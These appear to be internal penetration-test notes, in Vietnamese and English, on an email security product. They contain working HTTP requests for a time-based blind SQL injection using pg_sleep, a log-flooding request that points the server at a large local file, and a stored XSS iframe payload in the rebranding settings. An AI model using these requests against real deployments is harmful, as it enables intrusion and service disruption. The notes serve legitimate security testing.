MD Email Security 2025

New Features from 5.7.5

• Kể từ version 6.0.0: Đổi một phần DB từ SQLite sang PostgreSQL
• On-arrival URL reputation check: Tích hợp với MetaDefender Cloud để kiểm tra reputation của các URLs có trong email body.
• Scan results từ MD Core có thể được đính kèm vào email.
• Skip MFT supervisor approval
• Thêm trusted sender từ FROM header.
• Header filters: cho phép filter dựa trên header của email chẳng hạn như From, To, Subject.
• SMTP rewrite: cho phép rewrite domain của MAIL FROM hoặc RCPT TO khi email được gửi đến SMTP relay để có thể routing đến các alternative domains.
• Login banner: cho phép custom login banner.
• SMTP connection control: limit kết nối đến SMTP server.
• Rule wide header support: cho phép thêm custom headers vào email khi được xử lý bởi 1 rule nào đó.
• Enhanced Quarantine rescan page rebranding: UI tool để customize Quarantinve rescan page.
• Core workflows for each email component: cho phép sử dụng các workflow khác nhau của MD Core để xử lý từng phần của email (headers, bodies, attachments).
• SMTP multi-delivery: cho phép deliver một email đến nhiều SMTP servers.
• Rewrite email addresses in email headers: rewrite email addresses trong headers của email.

Attack Surfaces

• Recipient domain or address filter (RCPT TO): maybe ReDoS bằng cách tạo rule bị vulnerable và gửi email với recipient domain malicious.
• Display email body on the rescan page: XSS?
• Upload attachments to MetaDefender Managed File Transfer: archive vulnerabilities.

Blind SQL Injection

GET /stat/log/history?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b

GET /stat/log/rejected?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b

GET /stat/log/history?first=0&size=50&status=)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b

Decoded payload: insomnia)') or (select true from pg_sleep(5));--

Log Spam

POST /remotecorerules HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
Content-Type: application/json
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Origin: http://localhost:8058
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
 
{"uri":"file://localhost/C:/Windows/servicing/Sessions/Sessions.xml#"}

Với file C:/Windows/servicing/Sessions/Sessions.xml có kích thước khoảng 700MB, gửi request nhiều lần thì sẽ làm cho file log phình to ra.

Stored XSS

Chỉnh sửa rebranding page:

POST /admin/config/rebranding/rescan HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
Content-Type: application/json
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Origin: http://localhost:8058
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
Priority: u=0
 
{
  "en-US" : {
    "footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">Terms</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">Support</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">Privacy policy</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">Help center</a>\n\t\t\t\t\t</div>\n\t\t\t\t",
    "actions.description" : "Please select an action to execute on your quarantined email. <iframe/onload=alert(1337)>"
  },
  "en-GB" : {
    "footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">Terms</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">Support</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">Privacy policy</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">Help center</a>\n\t\t\t\t\t</div>\n\t\t\t\t"
  },
  "ja-JP" : {
    "footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">利用規約</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">サポート</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">プライバシーポリシー</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">ヘルプセンター</a>\n\t\t\t\t\t</div>\n\t\t\t\t",
    "actions.title" : "行動する",
    "actions.description" : "隔離された電子メールに対して実行するアクションを選択してください。"
  }
}

Với field actions.description có chứa payload <iframe/onload=alert(1337)> mà sẽ được render ra bởi thư viện Summernote có lỗ hổng XSS.

Broken Features

• Generate contact support package

Still not Fixed

• https://opswat.atlassian.net/wiki/spaces/SES/pages/3563553462/MetaDefender+Email+Security+Pentest+Report+-+2024.11#2.9-Sensitive-Data-Disclosure-in-Audit-Log
• https://opswat.atlassian.net/wiki/spaces/SES/pages/3563553462/MetaDefender+Email+Security+Pentest+Report+-+2024.11#2.4-Stored-XSS-(Cross-Site-Scripting)